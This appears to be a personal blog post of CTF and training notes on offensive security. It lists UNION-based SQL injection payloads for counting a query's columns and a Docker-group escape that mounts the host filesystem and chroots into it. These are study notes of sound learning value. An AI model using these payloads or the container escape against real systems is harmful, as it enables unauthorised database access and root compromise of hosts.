
#+STARTUP: showall indent
#+STARTUP: hidestars
#+OPTIONS: num:nil toc:nil
#+BEGIN_EXPORT html
---
title:  SQL Injection,
categories:
  - blog
tags:
    - SQLi
    - XSS
---
#+END_EXPORT

As mentioned before, I discoverd a major blindspot on the Basic SQLi. how to perform Union Based enumeration.
Yes thanks for THM to show me how weak my game is there :)

So I spend some time on INE eJPT path, to really get into the basics again.... and yes it's quite simple if you know and now I know.

I quess this is a Enumeration methoth anyone can remember :)

~' UNION SELECT NULL--~ \\
~' UNION SELECT NULL,NULL--~ \\
~' UNION SELECT NULL,NULL,NULL--~ \\


~' UNION SELECT 'a',NULL,NULL,NULL--~ \\
~' UNION SELECT NULL,'a',NULL,NULL--~ \\
~' UNION SELECT NULL,NULL,'a',NULL--~ \\
~' UNION SELECT NULL,NULL,NULL,'a'--~ \\

More info can be found here:
https://portswigger.net/web-security/sql-injection/union-attacks


I spend some time on a CFT on THM, and finally made it. Learning some pritty cool stuff on excaping a docker container.

Reference:
https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation

Basically if you are in the docker group, you can do the following:

~#Search the socket~ \\
~find / -name docker.sock 2>/dev/null~ \\
~#It's usually in /run/docker.sock~ \\

If found, than generate a new image, and mount the host filesystem into you image and chroot into it... thats a pretty nice.
Although not that realistic I guess, but good for CTFs

~#List images to use one~ \\
~docker images~ \\
~#Run the image mounting the host disk and chroot on it~ \\
~docker run -it -v /:/host/ ubuntu:18.04 chroot /host~ \\
